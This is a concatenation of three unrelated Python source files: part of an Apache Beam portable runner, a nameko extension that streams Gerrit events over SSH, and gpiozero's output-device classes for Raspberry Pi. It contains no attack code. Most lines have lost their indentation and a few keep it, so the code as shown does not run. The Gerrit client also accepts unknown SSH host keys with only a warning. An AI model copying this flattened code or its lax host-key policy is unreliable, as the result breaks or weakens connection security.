fn_api_runner_transforms.extract_impulse_stages,
fn_api_runner_transforms.remove_data_plane_ops,
fn_api_runner_transforms.sort_stages],
known_runner_urns=flink_known_urns)
elif pre_optimize == 'none':
pass
else:
raise ValueError('Unknown value for pre_optimize: %s' % pre_optimize)
if not job_service:
channel = grpc.insecure_channel(job_endpoint)
grpc.channel_ready_future(channel).result()
job_service = beam_job_api_pb2_grpc.JobServiceStub(channel)
else:
channel = None
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# The channel may report READY even though connections can still fail;
# this seems to be an issue only on Mac with port forwarding.
if channel:
grpc.channel_ready_future(channel).result()
return job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest())
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action' : 'store', 'help' : option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true'\
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
          # Ignore runner options that are already present; this is the only
          # case in which a duplicate is not treated as an error.
          if 'conflicting option string' not in str(e):
            raise
          logging.debug("Runner option '%s' was already added", option.name)
all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k, v in all_options.items()
if v is not None}
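    # For example (illustrative; the option names below are hypothetical):
    # with all_options == {'job_name': 'wordcount', 'parallelism': 4,
    # 'foo': None}, p_options becomes
    # {'beam:option:job_name:v1': 'wordcount',
    #  'beam:option:parallelism:v1': '4'}
    # - integers are stringified (BEAM-5509) and None values are dropped.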
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(p_options)))
if prepare_response.artifact_staging_endpoint.url:
stager = portable_stager.PortableStager(
grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
options,
staging_location='')
else:
retrieval_token = None
try:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=prepare_response.preparation_id))
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain(
[next(state_stream)],
state_stream)
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=prepare_response.preparation_id))
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result.
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
if state_stream is None:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=run_response.job_id))
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=run_response.job_id))
return PipelineResult(job_service, run_response.job_id, message_stream,
state_stream, cleanup_callbacks)
class PortableMetrics(metrics.metric.MetricResults):
def __init__(self):
pass
def query(self, filter=None):
return {'counters': [],
'distributions': [],
'gauges': []}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id, message_stream, state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
def cancel(self):
try:
self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
return PortableMetrics()
def _last_error_message(self):
    # Keep only the messages that carry a message_response, then filter
    # those down to error messages.
messages = [m.message_response for m in self._messages
if m.HasField('message_response')]
error_messages = [m for m in messages
if m.importance ==
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
logging.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(
message.state_response.state))
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' % (
self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
  def _cleanup(self):
    last_exception = None
    for callback in self._cleanup_callbacks:
      try:
        callback()
      except Exception as exn:
        # Remember the failure but keep running the remaining callbacks.
        last_exception = exn
    self._cleanup_callbacks = ()
    if last_exception is not None:
      raise last_exception
class BeamFnExternalWorkerPoolServicer(
beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolServicer):
def __init__(self, worker_threads):
self._worker_threads = worker_threads
@classmethod
def start(cls, worker_threads=1):
worker_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
worker_address = 'localhost:%s' % worker_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnExternalWorkerPoolServicer_to_server(
cls(worker_threads), worker_server)
worker_server.start()
return worker_address, worker_server
def NotifyRunnerAvailable(self, start_worker_request, context):
try:
worker = sdk_worker.SdkHarness(
start_worker_request.control_endpoint.url,
worker_count=self._worker_threads,
worker_id=start_worker_request.worker_id)
worker_thread = threading.Thread(
name='run_worker_%s' % start_worker_request.worker_id,
target=worker.run)
worker_thread.daemon = True
worker_thread.start()
return beam_fn_api_pb2.NotifyRunnerAvailableResponse()
except Exception as exn:
return beam_fn_api_pb2.NotifyRunnerAvailableResponse(
error=str(exn))
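# Illustrative sketch, not part of the upstream module: how the LOOPBACK
# worker pool above is started and torn down. It only uses the start()
# classmethod and grpc's server.stop(grace) as run_pipeline() does; the
# function name is hypothetical and it is never called here.
def _example_loopback_worker_pool_lifecycle():
  # Start an in-process worker pool; returns 'host:port' plus the gRPC server.
  address, server = BeamFnExternalWorkerPoolServicer.start(worker_threads=1)
  try:
    # run_pipeline() would pass this address as the LOOPBACK environment_config.
    return address
  finally:
    # Stop the server with a one second grace period, mirroring the
    # functools.partial(server.stop, 1) cleanup callback above.
    server.stop(1)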
|
extra_extension.py
|
import json
import pprint
import select
import threading
import traceback
from logging import getLogger
import paramiko
from nameko.extensions import ProviderCollector, SharedExtension
LOGGER = getLogger(__name__)
class GerritWatcherServer(ProviderCollector, SharedExtension):
"""
    A SharedExtension that wraps a gerrit client interface
    for processing gerrit events.
"""
def __init__(self, username=None, hostname=None,
port=None, keyfile=None):
super(GerritWatcherServer, self).__init__()
self.username = username
self.hostname = hostname
self.port = port
self.keyfile = keyfile
self._starting = False
self._stop = threading.Event()
self.client = None
def _dispatch(self, fd):
line = fd.readline()
if not line:
return
data = json.loads(line)
LOGGER.debug("Received data from Gerrit event stream: %s",
pprint.pformat(data))
providers = self.filter_provider(data)
for provider in providers:
provider.handle_message(data)
def filter_provider(self, msg):
providers = []
for provider in self._providers:
if provider.is_match(msg):
providers.append(provider)
return providers
def _listen(self, stdout, _stderr):
poll = select.poll()
poll.register(stdout.channel)
        while not self._stop.is_set():
ret = poll.poll()
for (fd, event) in ret:
if fd != stdout.channel.fileno():
continue
if event == select.POLLIN:
self._dispatch(stdout)
else:
                    raise Exception("Unexpected event on ssh connection")
def _connect(self):
"""
Attempts to connect and returns the connected client.
"""
def _make_client():
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
return client
client = None
try:
client = _make_client()
client.connect(self.hostname,
username=self.username,
port=self.port,
key_filename=self.keyfile)
return client
except (IOError, paramiko.SSHException) as e:
LOGGER.error("Exception connecting to %s:%s",
self.hostname, self.port)
if client:
try:
client.close()
except (IOError, paramiko.SSHException):
LOGGER.error("Failure closing broken client")
else:
raise e
def _consume(self):
"""
Consumes events using gerrit client.
"""
_, stdout, stderr = self.client.exec_command("gerrit stream-events")
self._listen(stdout, stderr)
ret = stdout.channel.recv_exit_status()
LOGGER.info("SSH exit status: %s", ret)
def _run(self):
        while not self._stop.is_set():
self.client = self._connect()
try:
self._consume()
# pylint: disable=broad-except
except Exception as e:
LOGGER.error('Hit exception: %s Back Trace: %s',
e, traceback.format_exc())
finally:
LOGGER.info("Stop client")
if self.client:
try:
self.client.close()
except (IOError, paramiko.SSHException):
LOGGER.error("Failure closing broken client")
def start(self):
if self._starting:
return
self._starting = True
th = threading.Thread(target=self._run, args=())
th.start()
def stop(self):
self._stop.set()
self.client.close()
super(GerritWatcherServer, self).stop()
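# Illustrative sketch, not part of the original extension: the minimal shape
# of a provider that _dispatch() expects. filter_provider() calls
# provider.is_match(msg) on the decoded JSON event, and matching providers
# receive handle_message(data). The class name and the 'comment-added'
# filter below are hypothetical.
class _ExampleCommentAddedProvider(object):
    def is_match(self, msg):
        # Gerrit stream-events carry a 'type' field such as 'comment-added'.
        return msg.get('type') == 'comment-added'
    def handle_message(self, msg):
        LOGGER.info("Handled comment-added event for change %s",
                    msg.get('change', {}).get('id'))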
|
output_devices.py
|
# GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2016-2019 Andrew Scheller <[email protected]>
# Copyright (c) 2015-2019 Dave Jones <[email protected]>
# Copyright (c) 2015-2019 Ben Nuttall <[email protected]>
# Copyright (c) 2019 tuftii <[email protected]>
# Copyright (c) 2019 tuftii <pi@raspberrypi>
# Copyright (c) 2016 Ian Harcombe <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
str = type('')
from threading import Lock
from itertools import repeat, cycle, chain
from colorzero import Color
from collections import OrderedDict
try:
from math import log2
except ImportError:
from .compat import log2
from .exc import OutputDeviceBadValue, GPIOPinMissing
from .devices import GPIODevice, Device, CompositeDevice
from .mixins import SourceMixin
from .threads import GPIOThread
from .tones import Tone
class OutputDevice(SourceMixin, GPIODevice):
"""
Represents a generic GPIO output device.
This class extends :class:`GPIODevice` to add facilities common to GPIO
output devices: an :meth:`on` method to switch the device on, a
corresponding :meth:`off` method, and a :meth:`toggle` method.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
super(OutputDevice, self).__init__(pin, pin_factory=pin_factory)
self._lock = Lock()
self.active_high = active_high
if initial_value is None:
self.pin.function = 'output'
else:
self.pin.output_with_state(self._value_to_state(initial_value))
def _value_to_state(self, value):
return bool(self._active_state if value else self._inactive_state)
def _write(self, value):
try:
self.pin.state = self._value_to_state(value)
except AttributeError:
self._check_open()
raise
def on(self):
"""
Turns the device on.
"""
self._write(True)
def off(self):
"""
Turns the device off.
"""
self._write(False)
def toggle(self):
"""
Reverse the state of the device. If it's on, turn it off; if it's off,
turn it on.
"""
with self._lock:
if self.is_active:
self.off()
else:
self.on()
@property
def value(self):
"""
Returns 1 if the device is currently active and 0 otherwise. Setting
this property changes the state of the device.
"""
return super(OutputDevice, self).value
@value.setter
def value(self, value):
self._write(value)
@property
def active_high(self):
"""
When :data:`True`, the :attr:`value` property is :data:`True` when the
device's :attr:`~GPIODevice.pin` is high. When :data:`False` the
:attr:`value` property is :data:`True` when the device's pin is low
(i.e. the value is inverted).
This property can be set after construction; be warned that changing it
will invert :attr:`value` (i.e. changing this property doesn't change
the device's pin state - it just changes how that state is
interpreted).
"""
return self._active_state
@active_high.setter
def active_high(self, value):
self._active_state = True if value else False
self._inactive_state = False if value else True
def __repr__(self):
try:
return '<gpiozero.%s object on pin %r, active_high=%s, is_active=%s>' % (
self.__class__.__name__, self.pin, self.active_high, self.is_active)
except:
return super(OutputDevice, self).__repr__()
class DigitalOutputDevice(OutputDevice):
"""
Represents a generic output device with typical on/off behaviour.
This class extends :class:`OutputDevice` with a :meth:`blink` method which
uses an optional background thread to handle toggling the device state
without further interaction.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
self._blink_thread = None
self._controller = None
super(DigitalOutputDevice, self).__init__(
pin, active_high, initial_value, pin_factory=pin_factory
)
@property
def value(self):
return super(DigitalOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def close(self):
self._stop_blink()
super(DigitalOutputDevice, self).close()
def on(self):
self._stop_blink()
self._write(True)
def off(self):
self._stop_blink()
self._write(False)
def blink(self, on_time=1, off_time=1, n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device, args=(on_time, off_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def _stop_blink(self):
if getattr(self, '_controller', None):
self._controller._stop_blink(self)
self._controller = None
if getattr(self, '_blink_thread', None):
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(self, on_time, off_time, n):
iterable = repeat(0) if n is None else repeat(0, n)
for _ in iterable:
self._write(True)
if self._blink_thread.stopping.wait(on_time):
break
self._write(False)
if self._blink_thread.stopping.wait(off_time):
break
class LED(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a light emitting diode
(LED).
Connect the cathode (short leg, flat side) of the LED to a ground pin;
connect the anode (longer leg) to a limiting resistor; connect the other
side of the limiting resistor to a GPIO pin (the limiting resistor can be
placed either side of the LED).
The following example will light the LED::
from gpiozero import LED
led = LED(17)
led.on()
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the LED will operate normally with the
circuit described above. If :data:`False` you should wire the cathode
to the GPIO pin, and the anode to a 3V3 pin (via a limiting resistor).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the LED will be off initially. If
:data:`None`, the LED will be left in whatever state the pin is found
in when configured for output (warning: this can be on). If
:data:`True`, the LED will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
LED.is_lit = LED.is_active
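# Illustrative sketch (hypothetical helper, not part of gpiozero): blinking
# an LED with the blink() API documented on DigitalOutputDevice above.
# Pin 17 is an arbitrary example pin.
def _example_blink_led():
    led = LED(17)
    # Five 0.5s-on/0.5s-off blinks; background=False blocks until finished.
    led.blink(on_time=0.5, off_time=0.5, n=5, background=False)
    led.close()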
class Buzzer(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a digital buzzer
component.
.. note::
This interface is only capable of simple on/off commands, and is not
capable of playing a variety of tones (see :class:`TonalBuzzer`).
Connect the cathode (negative pin) of the buzzer to a ground pin; connect
the other side to any GPIO pin.
The following example will sound the buzzer::
from gpiozero import Buzzer
bz = Buzzer(3)
bz.on()
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the buzzer will operate normally with
the circuit described above. If :data:`False` you should wire the
cathode to the GPIO pin, and the anode to a 3V3 pin.
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the buzzer will be silent initially. If
:data:`None`, the buzzer will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the buzzer will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
Buzzer.beep = Buzzer.blink
class PWMOutputDevice(OutputDevice):
"""
Generic output device configured for pulse-width modulation (PWM).
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If 0 (the default), the device's duty cycle will be 0 initially.
Other values between 0 and 1 can be specified as an initial duty cycle.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the device. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=0, frequency=100,
pin_factory=None):
self._blink_thread = None
self._controller = None
if not 0 <= initial_value <= 1:
raise OutputDeviceBadValue("initial_value must be between 0 and 1")
super(PWMOutputDevice, self).__init__(
pin, active_high, initial_value=None, pin_factory=pin_factory
)
try:
# XXX need a way of setting these together
self.pin.frequency = frequency
self.value = initial_value
except:
self.close()
raise
def close(self):
try:
self._stop_blink()
except AttributeError:
pass
try:
self.pin.frequency = None
except AttributeError:
# If the pin's already None, ignore the exception
pass
super(PWMOutputDevice, self).close()
def _state_to_value(self, state):
return float(state if self.active_high else 1 - state)
def _value_to_state(self, value):
return float(value if self.active_high else 1 - value)
def _write(self, value):
if not 0 <= value <= 1:
raise OutputDeviceBadValue("PWM value must be between 0 and 1")
super(PWMOutputDevice, self)._write(value)
@property
def value(self):
"""
The duty cycle of the PWM device. 0.0 is off, 1.0 is fully on. Values
in between may be specified for varying levels of power in the device.
"""
return super(PWMOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def on(self):
self._stop_blink()
self._write(1)
def off(self):
self._stop_blink()
self._write(0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is 0.0), this changes it to "fully" on (:attr:`value` is
1.0). If the device has a duty cycle (:attr:`value`) of 0.1, this will
toggle it to 0.9, and so on.
"""
self._stop_blink()
self.value = 1 - self.value
@property
def is_active(self):
"""
Returns :data:`True` if the device is currently active (:attr:`value`
is non-zero) and :data:`False` otherwise.
"""
return self.value != 0
@property
def frequency(self):
"""
The frequency of the pulses used with the PWM device, in Hz. The
default is 100Hz.
"""
return self.pin.frequency
@frequency.setter
def frequency(self, value):
self.pin.frequency = value
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(on_time, off_time, fade_in_time, fade_out_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(self, fade_in_time=1, fade_out_time=1, n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time, n, background
)
def _stop_blink(self):
if self._controller:
self._controller._stop_blink(self)
self._controller = None
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, n, fps=25):
sequence = []
if fade_in_time > 0:
sequence += [
(i * (1 / fps) / fade_in_time, 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((1, on_time))
if fade_out_time > 0:
sequence += [
(1 - (i * (1 / fps) / fade_out_time), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((0, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for value, delay in sequence:
self._write(value)
if self._blink_thread.stopping.wait(delay):
break
class TonalBuzzer(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a tonal buzzer.
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If :data:`None` (the default), the buzzer will be off initially. Values
between -1 and 1 can be specified as an initial value for the buzzer.
:type mid_tone: int or str
:param mid_tone:
        The tone which is represented by the device's middle value (0). The
default is "A4" (MIDI note 69).
:param int octaves:
        The number of octaves to allow away from the base note. The default is
        1, meaning a value of -1 is one octave below the base note and a value
        of 1 is one octave above it, i.e. from A3 to A5 with the default base
        note of A4.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. note::
Note that this class does not currently work with
:class:`~gpiozero.pins.pigpio.PiGPIOFactory`.
"""
def __init__(self, pin=None, initial_value=None, mid_tone=Tone("A4"),
octaves=1, pin_factory=None):
self._mid_tone = None
super(TonalBuzzer, self).__init__(
pwm_device=PWMOutputDevice(
pin=pin, pin_factory=pin_factory
), pin_factory=pin_factory)
try:
self._mid_tone = Tone(mid_tone)
if not (0 < octaves <= 9):
raise ValueError('octaves must be between 1 and 9')
self._octaves = octaves
try:
self.min_tone.note
except ValueError:
raise ValueError(
'%r is too low for %d octaves' %
(self._mid_tone, self._octaves))
try:
self.max_tone.note
except ValueError:
raise ValueError(
'%r is too high for %d octaves' %
(self._mid_tone, self._octaves))
self.value = initial_value
except:
self.close()
raise
def __repr__(self):
try:
if self.value is None:
return '<gpiozero.TonalBuzzer object on pin %r, silent>' % (
self.pwm_device.pin,)
else:
return '<gpiozero.TonalBuzzer object on pin %r, playing %s>' % (
self.pwm_device.pin, self.tone.note)
except:
return super(TonalBuzzer, self).__repr__()
def play(self, tone):
"""
Play the given *tone*. This can either be an instance of
:class:`~gpiozero.tones.Tone` or can be anything that could be used to
construct an instance of :class:`~gpiozero.tones.Tone`.
For example::
>>> from gpiozero import TonalBuzzer
>>> from gpiozero.tones import Tone
>>> b = TonalBuzzer(17)
>>> b.play(Tone("A4"))
>>> b.play(Tone(220.0)) # Hz
>>> b.play(Tone(60)) # middle C in MIDI notation
>>> b.play("A4")
>>> b.play(220.0)
>>> b.play(60)
"""
if tone is None:
self.value = None
else:
if not isinstance(tone, Tone):
tone = Tone(tone)
freq = tone.frequency
if self.min_tone.frequency <= tone <= self.max_tone.frequency:
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise ValueError("tone is out of the device's range")
def stop(self):
"""
Turn the buzzer off. This is equivalent to setting :attr:`value` to
:data:`None`.
"""
self.value = None
@property
def tone(self):
"""
Returns the :class:`~gpiozero.tones.Tone` that the buzzer is currently
playing, or :data:`None` if the buzzer is silent. This property can
also be set to play the specified tone.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return Tone.from_frequency(self.pwm_device.pin.frequency)
@tone.setter
def tone(self, value):
self.play(value)
@property
def value(self):
"""
Represents the state of the buzzer as a value between -1 (representing
the minimum tone) and 1 (representing the maximum tone). This can also
be the special value :data:`None` indicating that the buzzer is
currently silent.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
try:
return log2(
self.pwm_device.pin.frequency / self.mid_tone.frequency
) / self.octaves
except ZeroDivisionError:
return 0.0
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
freq = self.mid_tone.frequency * 2 ** (self.octaves * value)
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise OutputDeviceBadValue(
'TonalBuzzer value must be between -1 and 1, or None')
@property
def is_active(self):
"""
Returns :data:`True` if the buzzer is currently playing, otherwise
:data:`False`.
"""
return self.value is not None
@property
def octaves(self):
"""
The number of octaves available (above and below mid_tone).
"""
return self._octaves
@property
def min_tone(self):
"""
The lowest tone that the buzzer can play, i.e. the tone played
when :attr:`value` is -1.
"""
return self._mid_tone.down(12 * self.octaves)
@property
def mid_tone(self):
"""
The middle tone available, i.e. the tone played when :attr:`value` is
0.
"""
return self._mid_tone
@property
def max_tone(self):
"""
The highest tone that the buzzer can play, i.e. the tone played when
:attr:`value` is 1.
"""
return self._mid_tone.up(12 * self.octaves)
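# Illustrative sketch (hypothetical helper, not part of gpiozero): playing a
# few notes with the play()/stop() API shown above. Pin 21 is an arbitrary
# example pin; sleep() simply holds each note briefly.
def _example_play_notes():
    from time import sleep
    bz = TonalBuzzer(21)
    for note in ("A4", "B4", "C5"):
        bz.play(note)  # note names within the default A3..A5 range
        sleep(0.3)
    bz.stop()
    bz.close()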
class PWMLED(PWMOutputDevice):
"""
Extends :class:`PWMOutputDevice` and represents a light emitting diode
(LED) with variable brightness.
A typical configuration of such a device is to connect a GPIO pin to the
anode (long leg) of the LED, and the cathode (short leg) to ground, with
an optional resistor to prevent the LED from burning out.
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If ``0`` (the default), the LED will be off initially. Other values
between 0 and 1 can be specified as an initial brightness for the LED.
Note that :data:`None` cannot be specified (unlike the parent class) as
